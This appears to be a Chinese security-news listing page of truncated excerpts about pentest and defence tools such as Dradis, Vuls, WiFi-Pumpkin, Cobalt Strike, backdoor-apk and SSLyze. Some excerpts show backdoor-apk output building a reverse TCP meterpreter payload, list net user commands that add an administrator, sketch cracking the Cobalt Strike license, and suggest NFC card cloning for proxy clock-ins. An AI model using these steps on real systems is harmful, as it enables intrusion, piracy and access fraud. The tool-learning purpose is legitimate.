渗透测试报告是任何安全评估活动中的关键可交付成果。渗透测试中，最终可交付成果是一份报告，展示了所提供的服务，使用的方法，发现的结果和建议。许多渗透测试人员发现报告的制作是一个无聊的过程，因为它需要大量的时间和精力。在本文中，我们将讨论使用KaliLinux工具来简化制作报告的任务。这些工具可用于存储结果，做报告时的快速参考，与你的团队分享你的数据等。我们将学习如何使用这些工具上传BurpSuite、nmap、Nikto、OWASP Zap等的扫描结果。这篇文章我们将介绍如下工具：DradisMagic TreeMetagoofil让我们看看每个工具的详情。DradisDradis框架是一个开源的协作和报告平台。它是由Ruby开发的一个独立的平台。在接下来的几个步骤中,我们将学习如何使用Dradis。启动Kali Linux，”Application”->”Reporting Tools”->”Dradis”。Dradis是一个独立的web应用程序。因此,它会自动在浏览器中打开https://127.0.0.1:3004避免证书错误，然后点击“I Understand the Risks”按钮来添加一个例外Dradis。出现证书错误是因为Dradis使用的是自签名证书。因为是第一次访问，所以提供的是向导页面下一步 ...继续阅读 (38)

介绍当我的杀毒软件第13次尝试隔离我的病毒样本集时，我决心开发Manalyze。另一方面的原因也是我对杀毒软件日益失望，它们不会解释为什么把某个文件判断为恶意软件。显然，大部分人需要有个杀毒软件来帮他们做决定。但我认为很多专家用户，即病毒分析人员可以使用一种能够提供尽可能多信息的工具来分析PE可执行文件，并且由他们自己来做最后的决定。想要查看此工具生成的样本报告，可访问manalyzer.org。PE文件的静态分析工具Manalyze是用C++写的，支持Windows和Linux平台，以GPLv3协议发布。Manalyze是一款针对PE文件的强大分析器，它有灵活的插件架构，能让用户深入分析文件。它能够能够识别PE的编译器识别加壳的可执行文件应用ClamAV签名查找可疑字符串寻找恶意的入口组合(即 WriteProcessMemory + CreateRemoteThread)识别程序中密码算法（跟IDA的findcrypt插件类似）提交哈希值到VirusTotal验证authenticode签名（仅Windows）如何生成Linux 和 BSD平台(Debian Jessie 和 FreeBSD 10.2测试通过)$> [sudo or as root] apt-get install libboost-regex-devlibboost-program-options-de ...继续阅读 (31)

渗透测试报告是任何安全评估活动中的关键可交付成果。渗透测试中，最终可交付成果是一份报告，展示了所提供的服务，使用的方法，发现的结果和建议。许多渗透测试人员发现报告的制作是一个无聊的过程，因为它需要大量的时间和精力。在本文中，我们将讨论使用KaliLinux工具来简化制作报告的任务。这些工具可用于存储结果，做报告时的快速参考，与你的团队分享你的数据等。我们将学习如何使用这些工具上传BurpSuite、nmap、Nikto、OWASP Zap等的扫描结果。这篇文章我们将介绍如下工具：DradisMagic TreeMetagoofil让我们看看每个工具的详情。DradisDradis框架是一个开源的协作和报告平台。它是由Ruby开发的一个独立的平台。在接下来的几个步骤中,我们将学习如何使用Dradis。启动Kali Linux，”Application”->”Reporting Tools”->”Dradis”。Dradis是一个独立的web应用程序。因此,它会自动在浏览器中打开https://127.0.0.1:3004避免证书错误，然后点击“I Understand the Risks”按钮来添加一个例外Dradis。出现证书错误是因为Dradis使用的是自签名证书。因为是第一次访问，所以提供的是向导页面下一步 ...继续阅读 (30)

摘要对于系统管理员来说，每天进行安全漏洞分析和软件更新是每日必需的基本活动。为了避免生产环境中的故障，对系统管理员来说选择不使用由保管理器提供的自动更新选项并执行手动更新非常常见。但是这会导致以下问题的发生：1、系统管理员必需不断提防NVD（国际漏洞数据库）中所有新的安全漏洞等。对于系统管理员来说2、如果在服务器上安装了大量的软件，那么监控所有的软件基本是不可能的。3、通过执行分析来确定被漏洞影响的服务器需要付出高昂的代价。在分析过程中忽略一两个服务器是很正常的。Vuls是解决以上问题的工具。它具有以下特征：1、通知系统相关漏洞的用户。2、通知受影响服务器的用户。3、实现漏洞自动化检测以防止检查。4、在使用CRON等的日常基础上生成报告来管理漏洞。主要特点1、在Linux服务器上扫描安全漏洞1.1、支持Ubuntu，Debian，CentOS，Amazon Linux，RHEL ；1.2、支持Cloud，on－premise，Docker；2、系统包管理器中不包括扫描中间设备2.1、针对漏洞的扫描中间设备、程序语言库和框架；2.2、在CPE中注册支持软件；3、无代理架构要求用户只在一台通过SSH连接到其他目标服务器的机器上进行设置；4、配置文件模版的自动生成使用CIDR服务器设置的自动监测，生成配置文件模版；5、支持电子邮件和Slack通知（支持日本）；6、扫描结果在附件软件、TU ...继续阅读 (31)

现代商业分外依赖于数据中心。更多的工作负载、终端以及海量数据，围绕资源以及高效技术的需求不断增长。数据中心成为任何现代企业的心脏。虚拟化和云计算掌舵，许多人认为这对于数据中心业务而言棒极了。虽然从基础架构的角度看此言不虚，但是我们不能忘了随着更多的企业转移到这种类型的平台，更大的目标也出现了。云计算为企业提供了很多新类型的服务。包括托管选择、数据中心扩展以及新的灾难恢复策略。越来越多的云应用成为极具增长的安全威胁。几乎无疑随着分布式拒绝服务(DDoS)攻击的规模、频率以及复杂度不断上升，托管以及云服务提供商必须在适当的地方提供可以保护基础架构和服务的解决方案。现在，有三种具体类型的攻击是攻击者常用来攻击系统的：容量攻击TCP状态表耗尽攻击应用层攻击使用反射/放大发动大量攻击：已报道的最大攻击在2014年，为400Gbps，其他的报道的大型攻击在300、200和170Gbps，大概十年前，最大的攻击达到 8Gbps。多向量与应用层DDoS普遍存在：大部分遭受攻击的企业都遭受过应用层攻击，而多向量攻击往往结合了容量、应用层以及状态表耗尽攻击。DDoS攻击频繁上升：据悉2013年大部分遭受攻击的企业每月遭受差不多21次攻击，2014年则差不多上升到了38次。这种情况下该做点什么呢?当然是打一记漂亮的回击了。除了自身的安全策略之外，专业的DDoS防护服务则是最佳实践选择。云端卫士通过采集客 ...继续阅读 (17)

本文将针对主流移动平台（Android和iOS）的渗透测试工具按照类别整理出来，同时对每个工具进行了简短介绍并列出推荐指数，方便大家快速找到自己需要的工具，进一步提高渗透测试的工作效率。如果需要进一步了解工具的安装及其使用方法，你可以打开工具相关的链接。对于希望涉足这个领域的朋友，可以通过学习参考本文列出的工具，建立初步的认识。一、All-in-One移动安全框架MobSF：一款开源的智能化、集成化、自动化的移动应用（Android/iOS）渗透测试框架，可以执行静态和动态分析。（★★★★★）python manage.py runserver 127.0.0.1:1337二、Android应用渗透测试1. 渗透仿真环境Appie:一款便携式的Android渗透测试工具包，是现有虚拟机的绝佳替代者。（★★★★☆）Android Tamer：一个面向Android安全人员的虚拟/在线的平台。（★★★☆☆）AppUse：一款AppSec实验室开发的虚拟机。（★★★☆☆）Andro14b：也是一款虚拟机，主要目的是Android应用程序的评估、逆向工程以及恶意代码分析。（★★★☆☆）Mobisec：一个移动安全在线测试环境。（★★★☆☆）Santoku：一款操作系统，可以脱离虚拟机作为一个独立的操作系统运行。主要功能是逆向工程和静态分析。（★★★☆☆）2. 逆向工程和静态分析APKIns ...继续阅读 (32)

WiFi-Pumpkin是一款无线安全检测工具，利用该工具可以伪造接入点完成中间人攻击，同时也支持一些其它的无线渗透功能。旨在提供更安全的无线网络服务，该工具可用来监听目标的流量数据，通过无线钓鱼的方式来捕获不知情的用户，以此来达到监控目标用户数据流量的目的。主要功能1.Rouge Wi-Fi接入点功能2.Deauth攻击目标客户端AP功能3.探测请求监测功能4.Crendentials凭证监视功能5.DHCP攻击6.虚假的MAC地址广播DHCP请求攻击7.HSTS劫持攻击功能8.支持 airodump扫描检测功能9.支持mkd3洪水攻击10.支持beef hook功能11.可生成html日志12.支持Mac地址变换功能13.支持ARP攻击14.支持DNS欺骗功能服务支持hostapdisc-dhcp-serverphp5-cliLinux require（软件）:rfkill 、 iptables 、 nmcli需要安装 Pyqt4安装类库pip install -r requirements.txt安装git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git cd WiFi-Pumpkin chmod +x installer.sh ./installer.sh --install插件net-credsdns2proxyssls ...继续阅读 (29)

本文是关于一款Docker安全扫描器的一般性使用介绍，其原名为Project Nautilus。它可以作为Docker云私有仓库或者Docker Hub官方仓库的扩展服务，安全扫描会为你的Docker镜像提供主动的风险管理和软件合规管理的详细安全配置信息。Docker安全扫描在你部署之前可以对你的镜像进行二进制层面的扫描，并提供一个详细的材料清单（BOM）列出所有的层级和组件，不断监控新的漏洞，在新的漏洞出现时推送通知。  当你考虑现代软件供应链时，一个公司会在不同的时段协调一些不同的开发者和IT团队，来建立栈和基础设施，移动和运行软件。App开发团队最关心的就是尽可能快的写好软件并交付给客户。然而，软件供应链并不是以开发者结束，它还需要反复的迭代，在团队之间分享代码，在各个环境之间移动代码。Docker让app无缝移植并且通过安全平台传输，控制安全访问和安全内容。Docker安全扫描提供了深入Docker镜像内部的安全内容，包含内部组件的安全配置。这些信息在app生命周期的每个步骤都是可用的。让我们深入Docker安全扫描的更多细节，看看它是怎么工作的吧。   Docker安全扫描与Docker云协同使用（还有Docker数据中心），在新的镜像上传到仓库时触发一系列事件。这个服务包含一个扫描触发器，扫描器，数据 ...继续阅读 (22)

WAFW00F可以提取Web应用防火墙的指纹，识别WAF产品类型。WAFW00F是怎样工作的？为了实现这一目的，WAFW00F会执行如下操作：1、发送正常的HTTP请求，然后分析响应，这可以识别出很多WAF。2、如果不成功，它会发送一些（可能是恶意的）HTTP请求，使用简单的逻辑推断是哪一个WAF。3、如果这也不成功，它会分析之前返回的响应，使用其它简单的算法猜测是否有某个WAF或者安全解决方案响应了我们的攻击。要了解更多，请查看源代码。它能检测什么？它可以检测很多WAF。想要查看它能检测哪些WAF，以-l参数执行WAFW00F,在写这篇文章的时候，输出如下：$ ./wafw00f -l                                 ^     ^        _   __  _   ___ ...继续阅读 (25)

使用本程序可以让手机的NFC模拟各种门禁卡片，从而可以用手机代替门禁卡，文末提供演示。下载地址：http://nfcemulator.bmob.cn/ 作者qq：20321587(点我加q) Q群：220311948(点我加群)使用方法：1、程序需要获取root权限，部分机型需要解锁system；2、刷卡后，程序会自动存储新卡片，用户可在卡片管理界面给卡片命名；3、点击开始模拟后，可以选择需要模拟的卡片，点击确定后，手机会模拟该卡片；4、模拟成功后，系统会自动重启nfc；5、程序第一次运行，会联网下载适配文件，并且需要用户到右上角问号那里注册；6、程序第一次模拟，会自动备份原始NFC控制文件，可点击一键还原，将NFC还原为初始状态；7、上班一张卡片，回小区一张卡片，帮朋友代打卡一张卡片^_^。关于软件的适用范围请各位多熟悉一下NFC的原理，然后认真阅读这句话——本软件能让手机模拟门禁卡的UID，如果你的门禁卡能被你的手机识别，而且碰巧你们公司的门禁只识别卡片的UID，那么用本软件就可以使手机代替门禁卡用来刷卡了。其他情景几乎都不行！！！各种手动修改nfc控制文件的方法米5解锁system目录：http://www.miui.com/thread-3920737-1-1.html米5root教程：http://www.miui.com/thread-3941774-1-1. ...继续阅读 (65)

入侵计算机，网络和网站很容易让你进监狱。但是如果你有一个安全合法的环境来免费测试和练习你的黑客技能呢? 你还会入侵计算机，入侵网络，入侵网站吗？今天得到消息，为了鼓励学生和开发者来了解网络安全和进行安全编码的实践，Facebook刚刚将它的CTF平台开源了。Facebook CTF 视频：从2013年开始，Facebook就在全世界举办CTF竞赛。现在，它将它的ctf平台源码放在Github上开源并向大众开放ctf平台。 Facebook安全部工程师Gulshan Singh说：我们为所有人提供了一个能在后台维护的CTF平台，它有CTF游戏地图，能注册团队，还有得分榜。现在平台中的挑战包括逆向工程、取证技术、web应用程序安全、密码学和二进制攻击。你也可以在Facebook ctf平台上定制你自己的竞赛。废话不多说，Facebook CTF平台是怎样的呢，大家一起去看看吧。项目地址：https://github.com/facebook/fbctf项目介绍：fbctf是一个由facebook开源的ctf程序，由php语言编写。 安装方法：sudo apt-get install gitgit clone https://github.com/facebook/fbctfcd fbctf./extra/provision.sh prod `pwd` ...继续阅读 (26)

5月17日，云栖大会即将走进武汉。经过多位出品人认真筹备、倾力打造的技术盛宴即将呈现到参会者面前。从官网议程上可以看出，本次大会已邀请到50余位行业技术专家进行多场景实践分享，并为参会者奉上产品、技术、解决方案、生态领域等全方位内容，武汉峰会特设的7大专场涵盖：企业级混合云、合作伙伴、安全、企业级互联网架构、云市场、创客、互联网上云实践。为保证大会质量，专场出品人都会做多方面的调研与内容准备，每场内容的设置都会充分考量当地参会者的实际需求，所以云栖大会每一城市的内容分享都有不同的侧重点。很多报名的朋友们希望能对日程、讲师以及参会建议能够有进一步的解读，为此，云栖社区特别采访了分论坛出品人，为我们分享对于该场内容策划的思路，可以为用户带来哪些有益的帮助。本期采访嘉宾：阿里云安全专家苏建东（花名：蕴藉），安全专场出品人毕业于上海交通大学信息安全学院，10年信息安全领域研究与从业经验。2014年加入阿里，负责阿里云安全解决方案。《安全专场：DT无界，安全有道》关键词：安全解决方案、移动app安全、防DDoS、防入侵、数据加密、业务反欺诈、内容安全最新议程：https://yunqi.aliyun.com/2016/wuhan/schedule安全是一个严肃而系统性的话题，对于国家来说，没有网络安全就没有国家安全；对于企业来说，没有网络安全就没有企业的发展。因此网络安全是关系到用户业务生死 ...继续阅读 (41)

虽然分布式拒绝服务（或者DDoS）攻击并不是企业要处理的全新挑战，但是这种攻击的规模、范围以及频率都在不断上升。我们发现这些攻击在不断打破新的记录，2015年第四季度DDoS攻击增长了85%。企业则需要更认真地准备迎击这种类型的威胁。重中之重：在开始这张战役时，需要了解要面对的是什么。正如其名称的含义，DDoS试图阻碍正在运作的服务，攻击者使用大量的遍布整个互联网的机器向不知情的目标发送超大量的流量。通过巨量恶意流量淹没目标网站或者服务器，犯罪分子迫使企业依赖互联网属性的业务暂时脱机。虽然有时候是一种随机需求的威胁或者甚至是政治导向的攻击，但实际上仅仅是离线已经造成了品牌声誉以及技术可信度的巨大破坏，同时造成大量经济损失。但是这些攻击并不是一直都有高尖端的网络谋划着编排。黑客论坛、博客、甚至是YouTube视频都可以通过互联网连接轻松访问到如何设置DDoS攻击的信息。此外，最近有报道指出俄罗斯的攻击者现在可以以每天40美元的价格受雇对别人的网站进行攻击。这也意味着任何人都可以以有限的能力去发送自己的攻击。你怎么知道你就是DDoS的受害者？迎战DDoS攻击时，确定你的网站是否因为合法流量瘫痪还是因为攻击瘫痪存在挑战。不幸的是，企业没办法简单地检查是否所有的流量都来自一个IP地址，因为DDoS攻击的属性在于其流量来源于多个源。你能感知的区别就是通过服务瘫痪的时间长度来半段，如果访问缓慢 ...继续阅读 (18)

kali linux Python 黑客编程1 开发环境初始化为什么要选择Python？Python作为目前Linux系统下最流行的编程语言之一，对于安全工作者的作用可以和C++相提并论。Python提供了丰富的库供调用，丰富的第三方扩展模块。在网络应用，文本解析方面，Python编程有着其他语言无可比拟的优势。同时Python也是面向对象并且跨平台的语言，可以在linux/Unix、OSX、windows上无障碍运行。1.1查看Python版本信息Kali Linux默认已经安装了Python运行环境，运行下面的命令，可以查看当前Python版本。python –version1.2  Python软件包安装Python软件包安装，我们这里介绍三种方法，分别为手动，easy_install和pip安装。1.2.1手动安装第一种方法是手动下载软件包，运行安装程序来安装。比如我们想要使用Python-nmap组件去解析nmap的扫描结果，我们先手动下载安装包。wgethttp://xael.org/pages/python-nmap-0.6.0.tar.gz解压：root@kali:~# tar xzf python-nmap-0.6.0.tar.gzroot@kali:~# lsparos     & ...继续阅读 (53)

免责声明：本文旨在分享技术进行安全学习，禁止非法利用。本文中我将完整的阐述如何通过建立一个非常邪恶的网络接入点来使得用户进行自动文件下载。整个过程中我将使用 Nexus 9 来运行Kali NetHunter 2.0，并使用TP-LINK TLWN722N (150Mbps 版本)作为我的二级网络接口。工具（下载地址见文末）Mana – 恶意接入点工具包。它能够实现比Karma （Freebuf相关介绍：http://www.freebuf.com/articles/77055.html）攻击的更高级版本，相对而言最显著的变化就是Mana可以响应其他的AP广播，而不是像Karma这样只是探测设备，但其最终的目标仍然还是欺骗用户连接到自己设置的AP上。此外，它还有许多新奇的邪恶的AP欺骗技巧。（关于该工具的详细内容，建议可以看看Defcon 22 Talk 的内容，该工具就是在这里发布的。https://cyberarms.wordpress.com/2014/10/16/mana-tutorial-the-intelligent-rogue-wi-fi-router/）BackdoorFactory BDFProxy—— 被用于通过中间人攻击快速写入恶意payload。一个错误的开始这里由于我也希望可以向受害者提供互联网接入，从而可以在他们下载时部署我的后门，所以我还需要 Nexu ...继续阅读 (32)

免责声明：本文提及的安全工具和方法仅供试用及教学用途，禁止非法使用，请与24小时内删除！Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透测试工具，集成了端口转发、服务扫描，自动化溢出，多模式端口监听，win exe木马生成，win dll木马生成，java木马生成，office宏病毒生成，木马捆绑；钓鱼攻击包括：站点克隆，目标信息获取，java执行，浏览器自动攻击等等。而Cobalt Strike 3.0已经不再使用Metasploit框架而作为一个独立的平台使用，当然可以结合Armitage进行使用。破解方法1.官网下载最新版本。注意VPN采用美国节点，邮箱使用google 邮箱才可能收到试用版license。https://www.cobaltstrike.com/trial2.官方默认试用版是21天，所以我们先采用freebuf上的一篇文章进行破解，发现新版本该bug已经被修复。http://www.freebuf.com/sectool/76206.html3.我们根据链接中的内容找不到License.sl文件，却找到了license.class文件.4.利用java Decompiler 进行反编译。发现亮点。5.但是反编译出来的文件不能直接把21修改为其他数字。所以有2种思路。1.把反编译出来的源代码保存为.java文件，然后在利用jav ...继续阅读 (26)

Opera在几周前为自己的浏览器推出了免费VPN服务，然而当时该服务有着应用兼容性限制。现在，Opera推出了免费VPN服务的IOS应用，这样用户就可以在隐私保护下的网络世界畅游了！Opera VPN简介该应用程序被命名为Opera VPN，可以直接从iTunes下载。同其他VPN一样，它可以让用户查看一些政治、社会敏感的东西，比如Youtube视频站。毕竟有很多网站是禁止查看的，有了这样的免费VPN，您可以尽情浏览而不会被发现。更有意思的是，它还可以ban掉广告追踪cookie，避免您遭受广告的困扰。那么它是如何工作的呢？Opera VPN如其他VPN一样，可以让用户隐藏自己的实际位置。它会从完全不同的定位借用独立IP给用户。目前，用户可以选择来自美国、加拿大、荷兰、新加坡和德国的IP。Opera表示，它将在接下来的更新里增加更多的地理位置。当然，它并不是第一家为IOS设备提供VPN的供应商，但却是第一个而且是唯一一个做免费VPN服务的。另外，该应用目前为止没有涉及到任何付费，所以你暂时可以放心使用。然而，Opera表示未来如果能继续免费提供VPN服务，可能会插播广告以满足其服务的高成本。VPN服务带来的效益在一篇博文中，该公司VPN服务业务经理Chris Houston表示：“我们现在没有采取任何收费措施，但将来可能会在里面推送广告，就如大家玩免费的游戏一样。我们在广告商给用户 ...继续阅读 (10)

OWASP Zed Attack Proxy (ZAP)是一款用于寻找Web应用程序漏洞的综合性渗透测试工具，同时它也易于使用。ZAP是为拥有丰富经验的安全研究人员设计的，同时，也是渗透测试新手用于开 发和功能测试的理想工具，它也提供一系列工具用于手动寻找安全漏洞。同时该工具也是开源工具，支持多种语言版本。主要功能模糊测试主动扫描和被动扫描手动测试：上述步骤或许找到基本的漏洞。SSL证书欺骗请求断点（主要通过请求断点的方法实现绕过客户端验证，拦截请求从浏览器和改变它之前提交到网站所测试的应用程序）目录扫描支持多种脚本语言调用应用程序蜘蛛（AJAX）（查询网址）下载地址：点击我*参考来源：github，饭团君投递，转载请注明来自FreeBuf黑客与极客（FreeBuf.COM） ...继续阅读 (21)

OWASP VBScan (VBulletin Vulnerability Scanner的简写)，VBScan是采用Perl语言开发的一个开源项目，可对vBulletin CMS进行漏洞扫描检测。如果你想对vBulletin论坛做渗透测试，OWASP VBScan是一个很不错的选择。我们的这个项目将迅速跟进VBulletin的漏洞！项目发起人 :Mohammad Reza EsparghamGithub :https://github.com/rezasp/vbscan/SourceForge :https://sourceforge.net/projects/vbscan/OWASP 页面 :https://www.owasp.org/index.php/OWASP_VBScan_Project Usage 用法 :perl vbscan.pl <target> perl vbscan.pl http://target.com/vbulletin perl vbscan.pl --help*原文：KitPloit，转载请注明来自FreeBuf黑客与极客（FreeBuf.COM） ...继续阅读 (33)

SSLyze是一个Python打造的工具，它可以分析我们用于连接某服务器的SSL配置。其设计出来就是为了帮助组织和测试人员，快速发现会影响他们SSL服务器的错误配置。主要特点多进程+多线程扫描：速度会非常快。SSLyze也可以作为库文件，从python直接调用运行扫描和处理结果。性能测试：session resumption和TLS票据支持。安全测试：弱密码套件，不安全的renegotiation，CRIME、心脏滴血攻击。服务器证书检查，通过OCSP stapling进行SSL撤销检查。支持SMTP、XMPP、LDAP、POP、IMAP、RDP、PostGres、FTP协议的StartTLS握手。支持扫描服务器时，用于交互验证的客户端证书。扫描结果可以写入XML或者JSON文件进行进一步处理。开始使用下载地址：https://github.com/nabla-c0d3/sslyzeSSLyze可以通过pip直接安装：pip install sslyze直接从repository库里获取代码，然后进行安装也是很方便的。git clone https://github.com/nabla-c0d3/sslyze.gitcd sslyzepip install -r requirements. txt --target./lib然后我们可以使用命令行工具来扫描服务器了：python s ...继续阅读 (22)

cc攻击一到就有点兵临城下的感觉，正确的设置防护规则可以做到临危不乱，这里给出一个iptables对ip进行连接频率和并发限制，限制单ip连接和频率的设置规则的介绍#单个IP在60秒内只允许新建20个连接,这里假设web端口就是80,iptables -IINPUT -i eth1 -p tcp -m tcp –dport 80 -m state –state NEW -m recent –update –seconds 60 –hitcount 20 –name DEFAULT –rsource -j DROPiptables -I INPUT -i eth1 -p tcp -m tcp –dport 80 -m state –state NEW -m recent –set –name DEFAULT –rsource#控制单个IP的最大并发连接数为20iptables  -I INPUT -p tcp –dport 80 -m connlimit  –connlimit-above 20 -j REJECT#每个IP最多20个初始连接iptables -I  INPUT -p tcp –syn -m connlimit –connlimit-above 20 -j DROP参数解释：-p协议-m module_name：-m tcp 的 ...继续阅读 (37)

当遇到某个Hash值时，我们当然可以根据每种Hash值的不同特征来识别其可能的Hash类型，但是这一过程是十分耗时和繁琐的，而我们每个人都希望生活向更简单的方向前进。所以也就有了这篇文章。Hash Algorithm Identifier使用过Kali Linux或者Backtrack Linux的人，应该都知道一款名为Hash identifier的工具，这是一款十分优秀的工具，没有它，也不会有我这款工具的出现。但是Hash identifier的代码并不是很有效率，有大量的if-else-if，并且有许多方法构造是重复的，这一切使得它的代码十分冗余。所以我对其代码进行了重写(165行代码)，并扩充了其Hash识别库，目前支持160多种Hash加密方式的识别，以后会更多。我将这款工具命名为Hash-Algorithm-Identifier。下载你可以在GitHub上获取它。使用运行:python HashIdentifier.py赋予它可执行权限：chmod +x HashIdentifier.py执行它(一旦赋予了可执行权限，你可以通过下面的简单指令直接运行)：./HashIdentifier.py如果你不明白上面的步骤，不用担心。在GitHub上你会找到一个名为start.sh的文件，直接运行它就可以了。输入以下指令运行start.sh：sh start.sh代码介绍我使用正 ...继续阅读 (23)

FreeBuf百科：文件Fuzz背景知识不管是IE还是Office，它们都有一个共同点，那就是用文件作为程序的主要输入。不少程序员会存在惯性思维，即假设他们所使用的文件是严格遵守软件规定的数据格式。但是攻击者往往会挑战程序员的假定假设，尝试对软件所约定的数据格式进行稍微修改，观察软件是否在解析这种“畸形文件”时是否会发生崩溃或者溢出。文件格式Fuzz（File Fuzz）就是这种利用“畸形文件”测试软件鲁棒性的方法。——《漫谈漏洞挖掘之文件解析型漏洞》/ dragonltxPIT前段时间出了一个可以解析010Editor模板的Python工具——PFP。该工具可以对照010Editor的模板解析目标文件，将一个文件的输入流解析到对应的数据结构上。其解析的流程是：调用CPP将010Editor的模板文件正则化，然后再基于语法来对其进行解析。解析逻辑比较复杂，我也没看进去。不过基本的数据结构还是应该了解的。文件格式是由一个个字段组成的，这些字段的类型称为Field，继承于Python里的object对象。Field作为基类又派生出若干种类型，如:Struct，结构体类型Enum，枚举类型Union，联合类型Array，数组类型NumberBase，数值的基类IntBase，整数的基本UInt，32位整数USort，16位整数Char，字符……这些类型覆盖了C语言中的大多类型， ...继续阅读 (28)

如果你真的喜欢安全，了解下面这些工具是你通往大神之路的必备良品，快来看看都有哪些工具并学习一下吧！这份黑客工具列表中的一部分是基于Kali Linux的，其他的工具是通过我们的社区反馈的。下面介绍了这些工具的主要功能以及教程、书籍、视频等。端口扫描器：NmapNmap是"Network Mapper"的缩写，众所周知，它是一款非常受欢迎的免费开源黑客工具。Nmap被用于发现网络和安全审计。据数据统计，全世界成千上万的系统管理员使用nmap发现网络、检查开放端口、管理服务升级计划，以及监视主机或服务的正常运行时间。Nmap是一种使用原始IP数据包的工具，以非常创新的方式决定网络上有哪些主机，主机上的哪些服务（应用名称和版本）提供什么数据、什么操作系统、什么类型、什么版本的包过滤/防火墙正在被目标使用。使用nmap有什么好处，其中一个就是管理员用户能够确定网络是否需要打包。所有的黑客电影中都出现了nmap的身影，尤其是最近的Mr.Robot系列中。Nmap学习资料视频：https://www.concise-courses.com/hacking-tools/videos/category/2/nmap书籍：https://www.concise-courses.com/books/nmap/相似工具：https://www.concise-courses.com/ ...继续阅读 (54)

0×00 v0ltv0lt是一个我尝试重组每一个我使用过的/现在在使用的/将来要用的用python开发的安全领域CTF工具。实践任务可能会采用bash脚本来解决，但我认为Python更具有灵活性，这也是我做出这一选择的原因。和丹麦CTF队伍Gallopsled开发的pwntools没有关系，v0lt只是一个小型灵活但是却具有一些特别功能的工具包。0×01 要求和安装依赖关系:LibmagicPython3BeautifulSoupRequestsfilemagichexdumppasslib安装:git clone https://github.com/P1kachu/v0lt.git cd v0lt [sudo] python3 setup.py install # 要求sudo执行是因为可能存在缺失的依赖关系实例: Shellcodes>>> from v0lt import * >>> nc = Netcat("archpichu.ddns.net", 65102) Connected to port 65102 >>> print(nc.read()) GIVE ME SHELLCODZ >>> shellhack = ShellHack(4096, "bin","execve") ...继续阅读 (17)

Backdoor-apk可以看成是一个shell脚本程序，它简化了在Android APK文件中添加后门的过程。安全研究人员在使用该工具前应该对Linux、Bash、Metasploit、Apktool、Android SDK 、smali有所了解，同时原作者表示该工具仅仅供研究和学习使用。文章中介绍的工具、技术带有一定的攻击性，仅供安全研究，请合理合法使用。参数以及启用root@kali:~/Android/evol-lab/BaiduBrowserRat# ./backdoor-apk.sh BaiduBrowser.apk[*] Generating reverse tcp meterpreter payload...done.[+] Handle the meterpreter connection at: 10.6.9.31:1337[*] Decompiling original APK file...done.[*] Decompiling RAT APK file...done.[*] Creating new directories in original project for RAT smali files...done.[*] Copying RAT smali files to new directories in original project...d ...继续阅读 (38)

介绍DRAKVUF是一款无 Agent 的恶意软件动态分析系统，它基于Xen、LibVMI、Volatility、Rekall。它能深度追踪病毒样本，从内存中提取被删除的文件，并且无需在虚拟机里安装别的分析软件。硬件要求DRAKVUF使用Intel CPU中的硬件虚拟化扩展技术。你需要支持虚拟化(VT-x)和EPT(ExtendedPage Tables)的Intel CPU。DRAKVUF不能在其他CPU上运行(如AMD)或者不支持虚拟化扩展的CPU。支持系统DRAKVUF目前支持Windows 7，32位和64位系统演示使用DRAKVUF追踪Windows内部内核函数，包括堆分配。这个演示展示的是DRAKVUF中的进程注入组件，它能够在客机中执行任意可执行文件，不需要任何在客机中安装的帮助程序。演示中我们劫持了Windows任务管理器来执行我们的任务。从内存中提取被删除的文件。很多病毒droppes的文件只会出现在内存中，不会在硬盘出现。报告展示这是2014年年度计算机安全应用会议(ACSAC)的展示这是2014年在Hacktivity上的展示目前状态目前有以下的核心功能：无Agent执行恶意软件无Agent监控Windows内部内核函数客机多vCPU支持追踪堆分配追踪被访问的文件在文件被删除前从内存中提取文件通过写时拷贝内存和硬盘来克隆分析虚拟机注意DRAKVUF仍在早期开发 ...继续阅读 (26)

此工具是一款非常好用的Windows下提权辅助工具(已经支持Windows 10下的提权了)，国内已经有许多人在用了，但是一直没有相应的中文文档，所以我特地翻译了一下，水平有限，如有错误，欢迎指出，谢谢。描述该工具可以将目标系统的补丁安装情况与微软的漏洞数据库进行对比，进而检测出目标系统中潜在的未修复漏洞。同时此工具还会告知用户针对于此漏洞是否有公开的exp和可用的Metasploit模块。同时它可以使用–update参数去自动化地从微软下载漏洞补丁数据库，并将其以Excel表格的形式保存。需要注意的是，此工具首先会假定目标系统存在所有漏洞，然后再基于系统补丁情况去选择性的移除已修补漏洞。故此工具可能会造成一些误报，因此你首先需要了解目标机器安装了哪些软件。例如，如果此机器没有IIS的补丁，即使机器上没有IIS，工具也同样会认为存在此漏洞。此工具很大程度上受了Pentura的Linux_Exploit_Suggester的启发。使用方法1.首先需要更新漏洞数据库$ ./windows-exploit-suggester.py --update [*] initiating... [*] successfully requested base url [*] scraped ms download url [+] writing to file 2014-06-06-ms ...继续阅读 (69)

Recon-ng是一个全面的web探测框架，它由python编写，有着独立的模块、数据库交互功能、交互式帮助提示和命令补全的特性。它提供了一个强大的开源web探测机制，帮助测试人员快速彻底地进行探测。Recon-ng框架简介Recon-ng的使用和模式与主流的metasploit框架有点类似，这减少了用户学习利用该框架的难度。当然，Recon-ng也有着自己的特点，其为基于web的开源探测工具。如果你想要进行exp利用，请使用metasploit框架。如果你想进行社工，请使用社工工具包。如果你想进行被动探测，请使用Recon-ng。至于主动检测工具的例子，大家可以看看谷歌安全团队的Skipfish。Recon-ng是一个完全模块化的框架，新的python开发者也能很容易地进行模块贡献。每一个模块都是“module”类的子类，“module”类是一个定制的“cmd”解释器，内置提供了常用任务（如标准输出、数据库交互、进行web请求和API key管理）的简单接口。可以说，基本所有复杂的工作都已经被作者完成。我们想要构建新的模块会非常简单，仅仅需要几分钟。Modules（模块）Recon-ng约有80个recon模块，2个发现模块，2个exp利用模块，7个报告模块和2个导入模块：cache_snoop – DNS缓存录制interesting_files – 敏感文件探测command ...继续阅读 (44)

net user 查看系统中的用户信息 net user user /add       添加用户user net localgroup Administrators user /add 添加user用户为管理员组 net localgroup users user /del           从users组中删除user用户 net user user 查看user用户用户信息 net user user /active:no 禁用user用户 net user user /active:yes 激活user用户 net user user 123456       改变user用户密码为123456，不需要知道原密码 net user user "" 改变user用户密码为空 net user user /passwordchg:yes 用户user可以改变密码 net user user /passwordreq:yes 用户user必须拥 ...继续阅读 (64)